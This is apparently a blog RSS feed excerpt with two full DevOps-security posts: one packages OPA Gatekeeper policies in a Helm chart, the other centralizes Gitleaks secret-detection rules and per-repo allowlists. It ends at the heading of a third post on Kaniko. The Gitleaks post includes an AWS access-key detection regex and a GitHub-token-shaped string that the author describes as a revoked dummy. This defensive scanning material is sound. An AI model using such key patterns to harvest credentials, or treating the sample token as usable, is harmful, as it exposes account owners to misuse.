<p>OPA Gatekeeper rules are written in the Rego language, which is a pain to write &amp; maintain. Kyverno offers a much simpler solution, but it's not as flexible/extensible as OPA Gatekeeper. Despite its complexity, Gatekeeper is effective for writing custom rules tailored to the infrastructure.</p>
<p>For infrastructures comprising many different teams, it's easier to go with Kyverno or a similar tool because of the ease of getting started. But if we want granular customizations, we have to go with OPA Gatekeeper. However, writing Rego rules for every customization is often complex. How do we bridge this gap?</p>
<h2 id="heading-solution">Solution</h2>
<p>We need a solution that's extensible &amp; easy to use and maintain. The Gatekeeper team has done an amazing job creating a <a target="_blank" href="https://github.com/open-policy-agent/gatekeeper-library">library of rules</a>. It gives a good overview of the different rules we can write in OPA Gatekeeper.</p>
<p>If that's amazing, where's the catch? Well, it's easy to use but difficult to configure when we want to use it across multiple teams/clusters. Developers/DevOps/other teams have to dive into the templates &amp; CRDs to customize it further. Unfortunately, not everyone is good at customizing Rego rules or editing templates. Also, creating multiple files for each customization isn't an ideal approach.</p>
<p>Taking inspiration from the OPA team's work on <a target="_blank" href="https://github.com/open-policy-agent/gatekeeper-library">rules library</a>, we have <strong>customized their work to integrate with</strong> <a target="_blank" href="https://helm.sh"><strong>Helm</strong></a>.</p>
<p>Now, developers/DevOps/other teams can install rules with just the <code>helm install</code> command. Since we are using Helm, the values for all templates/CRDs are available in <code>values.yaml</code>. This single file acts as an interface for end-users to understand which rules/policies are applied.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Source: https://github.com/rewanthtammana/gatekeeper-rules-helm-library/blob/main/values.yaml</span>

<span class="hljs-attr">globalImport:</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span>

<span class="hljs-attr">K8sPSPAllowPrivilegeEscalationContainer:</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span>  <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span>  <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">"Cluster"</span>

<span class="hljs-attr">K8sPSPCapabilities:</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">true</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">"Cluster"</span>
  <span class="hljs-attr">parameters:</span>
    <span class="hljs-attr">allowedCapabilities:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"hello"</span>
    <span class="hljs-attr">requiredDropCapabilities:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"KILL"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"MKNOD"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"SETUID"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"SETGID"</span>
    <span class="hljs-attr">exemptImages:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"nginx:latest"</span>

<span class="hljs-string">...</span>
</code></pre>
<p>In daily use, there will be cases where we have to add exclusions, like excluding a namespace from specific rule(s). So, we added a global exclusion list (<code>globalImport.excludeNamespaces</code>) in <code>values.yaml</code>. You can add the namespaces you want to exclude at the global level, &amp; the Helm template will append them to the exclusion list of every rule. You can override this behaviour per rule by toggling the <code>excludeNamespacesDefaultFlag</code> variable. This makes it easy to organize &amp; understand things. Similarly, there is an <code>includeNamespacesDefaultFlag</code>, but it's recommended not to use it because, by default, the rules apply to all namespaces.</p>
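<p>For one-off tweaks, the same toggles can be set on the command line at install/upgrade time instead of editing <code>values.yaml</code>. A sketch using standard Helm flags and the value keys shown above; the chart path and the <code>monitoring</code> namespace are placeholders for illustration.</p>
<pre><code class="lang-bash"># Add extra namespaces to the global exclusion list and
# opt one rule into those global exclusions via its per-rule flag
helm upgrade --install gatekeeper-rules ./gatekeeper-rules-helm-library \
  --set 'globalImport.excludeNamespaces={kube-system,monitoring}' \
  --set K8sPSPAllowPrivilegeEscalationContainer.excludeNamespacesDefaultFlag=true
</code></pre>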
<p>Helm gives us the luxury of creating multiple releases, each with a different set of rules, like one release for PSP-style rules, another for general rules, etc. You can upgrade/delete a set of rules easily with Helm.</p>
<p><code>helm list -A</code> returns the list of installed releases.</p>
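<p>A minimal sketch of managing a couple of releases this way, assuming the chart is cloned locally and the values files below are your own (the names are placeholders):</p>
<pre><code class="lang-bash"># One release for PSP-style rules, another for general rules
helm install psp-rules ./gatekeeper-rules-helm-library -f psp-values.yaml
helm install general-rules ./gatekeeper-rules-helm-library -f general-values.yaml

# Inspect and clean up
helm list -A
helm uninstall psp-rules
</code></pre>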
<h2 id="heading-code-outline-andamp-structure">Code outline &amp; structure</h2>
<p>Each rule/entry in <code>values.yaml</code> looks something like this. You can tweak the values &amp; customize the templating according to your use case.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">K8sPSPForbiddenSysctls:</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">true</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">"Cluster"</span>
  <span class="hljs-attr">parameters:</span>
    <span class="hljs-attr">forbiddenSysctls:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"*"</span>
</code></pre>
<p>The associated template for the above rule looks as below.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Source: https://github.com/rewanthtammana/gatekeeper-rules-helm-library/blob/main/templates/pod-security-policy/forbidden-sysctls.yaml</span>

{{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">-</span>}}
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">constraints.gatekeeper.sh/v1beta1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">K8sPSPForbiddenSysctls</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">psp-forbidden-sysctls-{{.Release.Name}}</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">match:</span>
    <span class="hljs-attr">kinds:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">""</span>]
        <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">custom</span> <span class="hljs-string">values</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">or</span> <span class="hljs-string">(.Values.K8sPSPForbiddenSysctls.includeNamespaces)</span> <span class="hljs-string">(hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"includeNamespacesDefaultFlag"</span><span class="hljs-string">)</span>}}
    {{<span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">specific</span> <span class="hljs-string">namespaces</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    <span class="hljs-attr">namespaces:</span>
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">for</span> <span class="hljs-string">globalimport</span> <span class="hljs-string">include</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"includeNamespacesDefaultFlag"</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.includeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.includeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">else</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.globalImport.includeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.includeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.includeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">excludeNamespaces</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">or</span> <span class="hljs-string">(.Values.K8sPSPForbiddenSysctls.excludeNamespaces)</span> <span class="hljs-string">(hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"excludeNamespacesDefaultFlag"</span><span class="hljs-string">)</span>}}
    <span class="hljs-attr">excludedNamespaces:</span>
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">for</span> <span class="hljs-string">globalimport</span> <span class="hljs-string">include</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"excludeNamespacesDefaultFlag"</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.excludeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.excludeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">else</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.globalImport.excludeNamespacesDefaultFlag</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.globalImport.excludeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.excludeNamespaces</span>}}
      <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">scope</span> <span class="hljs-string">is</span> <span class="hljs-string">defined</span> <span class="hljs-string">(Cluster/Namespace)</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.scope</span>}}
    <span class="hljs-attr">scope:</span> {{<span class="hljs-string">.Values.K8sPSPForbiddenSysctls.scope</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">custom</span> <span class="hljs-string">values</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.parameters</span>}}
  {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.parameters.forbiddenSysctls</span>}}
  <span class="hljs-attr">parameters:</span>
    <span class="hljs-attr">forbiddenSysctls:</span>
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">range</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls.parameters.forbiddenSysctls</span>}}
    <span class="hljs-bullet">-</span> {{<span class="hljs-string">.</span> <span class="hljs-string">|</span> <span class="hljs-string">quote</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
  {{<span class="hljs-string">end</span>}}
  {{<span class="hljs-string">end</span>}}
  {{<span class="hljs-string">end</span>}}
{{<span class="hljs-bullet">-</span> <span class="hljs-string">end</span> <span class="hljs-string">-</span>}}
</code></pre>
<h2 id="heading-installation">Installation</h2>
<ol>
<li><p>Clone https://github.com/rewanthtammana/gatekeeper-rules-helm-library</p>
</li>
<li><p>Create all CRDs. The CRDs are available in the <code>./crds</code> folder.</p>
<pre><code class="lang-bash">kubectl create -f ./crds/general/
kubectl create -f ./crds/pod-security-policy/
</code></pre>
</li>
<li><p>Install the templates. The <code>values.yaml</code> can be tweaked to adjust template values.</p>
<pre><code class="lang-bash">helm install rules-helm .
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655545082235/4y4qpJygR.png" alt="image.png" /></p>
</li>
</ol>
<h2 id="heading-conclusion">Conclusion</h2>
<p>This kind of structuring keeps the management of Gatekeeper rules simple and leaves the rules library easy to extend. Separate <code>values.yaml</code> files can be created per domain, for example <code>psp-values.yaml</code> with the PSP template values, <code>general-values.yaml</code> with the general template values, and so on, taking the complexity away from the operations team.</p>
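<p>A minimal sketch of that workflow, assuming the chart is checked out locally and the per-domain values files mentioned above exist next to it:</p>
<pre><code class="lang-bash"># One release per rule domain; the values file names follow the examples above
helm install psp-rules . -f psp-values.yaml
helm install general-rules . -f general-values.yaml
</code></pre>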
<h2 id="heading-references">References</h2>
<p><a target="_blank" href="https://github.com/rewanthtammana/gatekeeper-helm-library">https://github.com/rewanthtammana/gatekeeper-helm-library</a></p>
<p><a target="_blank" href="https://github.com/open-policy-agent/gatekeeper-library">https://github.com/open-policy-agent/gatekeeper-library</a></p>
<h2 id="heading-authors">Authors</h2>
<p><a target="_blank" href="https://www.linkedin.com/in/siddharthtanna/">Siddharth Tanna</a></p>
<p><a target="_blank" href="https://www.linkedin.com/in/rewanthtammana">Rewanth Tammana</a></p>
]]></content:encoded></item><item><title><![CDATA[Gitleaks For Enterprises]]></title><description><![CDATA[The default configuration of Gitleaks isn't feasible to use across multiple projects for teams/organizations. In this article, we will understand the need for having a secret scanning tool in your environment, a quick intro on challenges with default...]]></description><link>https://blog.rewanthtammana.com/gitleaks-for-enterprises</link><guid isPermaLink="true">https://blog.rewanthtammana.com/gitleaks-for-enterprises</guid><category><![CDATA[Security]]></category><category><![CDATA[software architecture]]></category><category><![CDATA[Python 3]]></category><category><![CDATA[automation]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sat, 28 May 2022 19:00:49 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1653123265587/U21J3InBo.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The default configuration of Gitleaks isn't feasible to use across multiple projects for teams/organizations. In this article, we will understand the need for having a secret scanning tool in your environment, a quick intro on challenges with default Gitleaks configuration when we try to use it in enterprises/across projects &amp; how we can fix it. </p>
<p><strong>Github:</strong> <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-for-enterprise">gitleaks-for-enterprise</a></p>
<h3 id="heading-introduction">Introduction</h3>
<p>Many recent security breaches stem from a simple misconfiguration or from leaked secrets, API keys, and similar credentials. Detecting these issues at an early stage of the build process is invaluable. Identifying secrets &amp; sensitive information plays a key role in the shift-left security DevOps approach.</p>
<h3 id="heading-about-gitleaks">About Gitleaks</h3>
<p><a target="_blank" href="https://github.com/zricethezav/gitleaks">Gitleaks</a> is a SAST tool for detecting and preventing hardcoded secrets like passwords, API keys, and tokens in git repos. Gitleaks is an easy-to-use, all-in-one solution for detecting secrets, past or present, in your code.</p>
<h3 id="heading-usage">Usage</h3>
<pre><code class="lang-bash">gitleaks detect -c ./gitleaks.toml --<span class="hljs-built_in">source</span> /path/to/repo
</code></pre>
<pre><code class="lang-bash">$ cat gitleaks.toml
...
[[rules]]
    description = <span class="hljs-string">"Rule 1: AWS Access Key"</span>
    regex = <span class="hljs-string">''</span><span class="hljs-string">'(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'</span><span class="hljs-string">''</span>
    tags = [<span class="hljs-string">"key"</span>, <span class="hljs-string">"AWS"</span>]
...
</code></pre>
<p>The best part of Gitleaks is that it lets us add an <code>allowlist</code> per <code>rule</code>, scoped by <code>commitID</code>, <code>fileName</code>, <code>data</code>, etc. This is helpful while dealing with false positives.</p>
<pre><code class="lang-bash">$ cat gitleaks-with-allowlist.toml
...
[[rules]]
    description = <span class="hljs-string">"Rule 1: AWS Access Key"</span>
    regex = <span class="hljs-string">''</span><span class="hljs-string">'(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'</span><span class="hljs-string">''</span>
    tags = [<span class="hljs-string">"key"</span>, <span class="hljs-string">"AWS"</span>]
    [rules.allowlist]
    description = <span class="hljs-string">"Ignore revoked AWS Key"</span>
    commits = [ <span class="hljs-string">"commit-A"</span> ]
    paths = [ <span class="hljs-string">''</span><span class="hljs-string">'config.env'</span><span class="hljs-string">''</span> ]
...
</code></pre>
<p>There are multiple ways to integrate Gitleaks into your environment, such as pre-commit hooks, CI pipelines, etc., which makes adoption easy.</p>
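<p>As a rough sketch, a pre-commit hook can simply run the same <code>detect</code> command and abort the commit when leaks are found (the hook path and behaviour below are illustrative, not part of Gitleaks itself):</p>
<pre><code class="lang-bash">#!/usr/bin/env bash
# Illustrative .git/hooks/pre-commit: fail the commit if gitleaks reports findings
if ! gitleaks detect -c ./gitleaks.toml --source . ; then
  echo "gitleaks found potential secrets, aborting commit"
  exit 1
fi
</code></pre>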
<p>Everything looks great. Where is the problem?</p>
<h3 id="heading-existing-architecture-andamp-drawbacks">Existing architecture &amp; drawbacks</h3>
<p>If you want to run Gitleaks on 2-3 projects, it's straightforward. But things get quite challenging &amp; interesting when we want to integrate it into larger organizations with tens/hundreds of projects. Why?</p>
<ol>
<li>The default structure of <code>gitleaks.toml</code> makes it impossible to use it across multiple projects</li>
<li>The whitelisting of false positives across multiple projects can be a real challenge</li>
<li>Having a separate <code>gitleaks.toml</code> for each project isn't a feasible solution either. Why? Suppose you have 100 repositories, each with its own <code>gitleaks.toml</code> file. You can add project-specific whitelisting to each file, but the moment you want to add a new detection rule, keeping those values in sync across all the repositories becomes a nightmare.</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1652714624519/7Tl6T_k-D.png" alt="Gitleaks-Default-Design.drawio.png" /></p>
<p>The existing structure of <code>gitleaks.toml</code> doesn't give us the flexibility to achieve it. What now?</p>
<h3 id="heading-upgraded-architectural-design">Upgraded architectural design</h3>
<p>We should build a design that's flexible &amp; open to extension with ease. What do we need?</p>
<ol>
<li>Centralized repository for detection rules &amp; exceptions</li>
<li>All secret detection rules <strong>must be</strong> in a single file</li>
<li>The exceptions differ for every project, and so do the conditions under which a rule becomes an exception. Hence, the allowlist rules for each project should be stored in separate files.</li>
<li>A connector that will combine the detection rules &amp; exception list in a way that <code>gitleaks</code> can understand.</li>
<li>Run <code>gitleaks</code> on the specific repository along with the data gathered above.</li>
</ol>
<p>The design looks something like this.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1652714633471/wZ4day3ry.png" alt="Gitleaks-For-Enterprises-Design.drawio.png" /></p>
<h3 id="heading-how-to-configure-andamp-use-it">How to configure &amp; use it</h3>
<ol>
<li>Check the <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-for-enterprise">gitleaks-for-enterprise</a> repository. The directory structure is as follows - <code>allowlist/$USERNAME/$REPONAME/allowlist.toml</code>
 <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653063995509/MXdgcvtBO.png" alt="Show-Allowlist-Directory-Structure.png" /></li>
<li>Next step is to clone <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-for-enterprise">gitleaks-for-enterprise</a> &amp; generate <code>gitleaks.toml</code>. We have a <code>base.toml</code> file with all the detection rules. The <code>allowlist</code> folder contains exceptions for all projects.</li>
<li>If this is your first time generating <code>gitleaks.toml</code>, this file would be equivalent to <code>base.toml</code> because there's no <code>allowlist.toml</code> for your target project yet.<pre><code class="lang-bash"> git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/gitleaks-for-enterprise
 <span class="hljs-built_in">cd</span> gitleaks-for-enterprise
 python3 run.py -a allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.toml &gt; gitleaks.toml
</code></pre>
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653762115959/9RoBodrlZ.png" alt="gitleaks-generation.png" /></li>
<li>For this example, let's run it on a demo repository, <a target="_blank" href="https://github.com/rewanthtammana/gitleaks-demo-repo">gitleaks-demo-repo</a>. Clone this repo locally &amp; run gitleaks on it. There are 6 leaks identified.<pre><code class="lang-bash"> git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/gitleaks-demo-repo /tmp/gitleaks-demo-repo
 gitleaks detect -c ./gitleaks.toml --<span class="hljs-built_in">source</span> /tmp/gitleaks-demo-repo
</code></pre>
 <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653064100802/1mqGKyZNF.png" alt="Gitleaks-First-Run.png" /></li>
<li>Append <code>-v</code> option to the above gitleaks command to view gitleaks information. I have leaked dummy values for demo purposes.<pre><code class="lang-bash"> gitleaks detect -c ./gitleaks.toml --<span class="hljs-built_in">source</span> /tmp/gitleaks-demo-repo -v
</code></pre>
 <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653064192844/t2GqR1ugD.png" alt="Gitleaks-first-output-analysis.png" /></li>
<li>Let's say we revoked the GitHub key identified above, <code>ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX</code>.</li>
<li>After a revocation, you can visit your <code>gitleaks-for-enterprise</code> setup &amp; add this revocation as an exception.<ol>
<li>There are multiple ways to add exceptions based on commit id, value, file name, etc.</li>
</ol>
</li>
<li>In this case, let's take the data as an exception. Here it will be <code>ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX</code></li>
<li>The allowlists should be in the below format for ease of organizing &amp; access control, <code>allowlist/$USERNAME/$REPONAME/allowlist.toml</code></li>
<li><p>In this case, we have to create a file <code>allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.toml</code> with the following data as an exception.</p>
<pre><code class="lang-toml"><span class="hljs-comment"># Rule specific white listing</span>
<span class="hljs-section">[[rules]]</span>
    <span class="hljs-attr">id</span> = <span class="hljs-string">"8"</span>
    <span class="hljs-section">[rules.allowlist]</span>
        <span class="hljs-attr">regexes</span> = [<span class="hljs-string">'''ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX'''</span>]
</code></pre>
</li>
<li>Now generate a new <code>gitleaks.toml</code> file. This will be different from the base file because now we have an <code>allowlist.toml</code> file that will change the course.<pre><code class="lang-bash">python3 run.py -a allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.toml &gt; gitleaks.toml
</code></pre>
</li>
<li>As we can see, the number of leaks drops from 6 to 4. Also, the GitHub key we revoked, <code>ghp_WtfdNeDljtnHfLaVePtZll6NQBqU6c0jiuSX</code>, is no longer reported as a finding.
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1653064255272/qYin5eVlD.png" alt="Github-key-in-allowlist.png" /></li>
<li>Similarly, you can add more exceptions specific to your repo. In this case, the repo is <code>rewanthtammana/gitleaks-demo-repo</code>, so we created <code>allowlist/rewanthtammana/gitleaks-demo-repo/allowlist.toml</code>.</li>
</ol>
<h3 id="heading-further-scope-andamp-conclusion">Further Scope &amp; Conclusion</h3>
<p>This setup can be easily integrated with CI pipelines to identify sensitive information &amp; is a practical step towards shift-left security.</p>
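<p>A rough sketch of what such a CI job could run, reusing the commands from the walkthrough above (the checkout path and the <code>$USERNAME</code>/<code>$REPONAME</code> variables are placeholders):</p>
<pre><code class="lang-bash"># Illustrative CI steps: build the per-project config, then scan the checked-out repo
git clone https://github.com/rewanthtammana/gitleaks-for-enterprise
cd gitleaks-for-enterprise
python3 run.py -a allowlist/$USERNAME/$REPONAME/allowlist.toml &gt; gitleaks.toml
gitleaks detect -c ./gitleaks.toml --source /path/to/repo
</code></pre>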
<p>The model is designed to be extensible &amp; efficient. This layout can be easily expanded to hundreds/thousands of projects &amp; still provide you the flexibility to have a centralized repository to maintain all the rules &amp; exceptions.</p>
<p>As we have only <code>base.toml</code> with all the detection rules, it's quite affordable for the teams to update the rules frequently &amp; use them across multiple projects.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>By leveraging this kind of directory structure &amp; framework, any team can maintain a centralized repository for all their detection rules &amp; exception lists. This makes the setup easy for developers, DevOps, security, and even business teams to use, &amp; it integrates smoothly with CI. Hope this restructuring helps you with Gitleaks integration in your enterprise or across multiple projects.</p>
]]></content:encoded></item><item><title><![CDATA[Hardening Kaniko build process with Linux capabilities]]></title><description><![CDATA[Introduction to Kaniko
Kaniko is a tool to build container images from a Dockerfile, inside a container or Kubernetes cluster. More information on usage, here.
Kaniko doesn't depend on a Docker daemon and executes each command within a Dockerfile com...]]></description><link>https://blog.rewanthtammana.com/hardening-kaniko-build-process-with-linux-capabilities</link><guid isPermaLink="true">https://blog.rewanthtammana.com/hardening-kaniko-build-process-with-linux-capabilities</guid><category><![CDATA[Docker]]></category><category><![CDATA[Build tool]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Developer Tools]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 26 Jan 2022 02:19:21 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1643164134194/QBqkpFgoO.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction-to-kaniko">Introduction to Kaniko</h2>
